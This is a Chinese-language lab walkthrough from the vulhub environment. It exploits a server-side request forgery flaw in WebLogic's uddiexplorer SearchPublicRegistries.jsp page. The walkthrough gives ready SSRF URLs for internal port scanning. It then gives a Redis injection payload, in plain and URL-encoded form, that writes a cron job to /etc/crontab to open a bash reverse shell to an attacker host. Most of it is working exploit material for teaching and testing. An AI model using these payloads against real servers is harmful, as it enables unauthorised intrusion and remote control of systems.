Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
测试环境搭建
cd vulhub/weblogic/ssrf
docker-compose up -d
访问http://your-ip:7001/uddiexplorer/
,无需登录即可查看uddiexplorer应用。
SSRF漏洞测试
SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp
,我们在brupsuite下测试该漏洞。访问一个可以访问的IP:PORT,如http://127.0.0.1:80
:
探测本机端口开放情况
http://172.16.32.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
探测内网其他主机端口开放情况
http://172.16.32.134:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.16.32.128:3306
攻击内网redis
查看redis ip
docker exec -it ssrf_redis_1 ip addr
探测redis 6379端口是否开启
kali开启监听端口
构造redis攻击脚本,并反弹shell
test
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/172.16.32.130/444 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
aaa
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.16.32.130%2F4449%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
将攻击脚本进行URL编码并拼接在URL后成功拿到shell